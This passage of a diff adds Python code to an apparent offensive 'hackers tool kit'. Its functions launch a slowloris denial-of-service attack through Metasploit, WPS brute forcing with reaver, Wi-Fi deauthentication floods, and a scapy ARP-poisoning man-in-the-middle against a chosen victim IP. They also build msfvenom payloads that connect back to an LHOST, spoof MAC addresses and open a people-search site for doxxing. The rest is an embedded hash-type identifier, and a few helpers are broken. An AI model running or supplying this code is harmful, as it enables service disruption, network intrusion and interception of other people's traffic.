/root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + 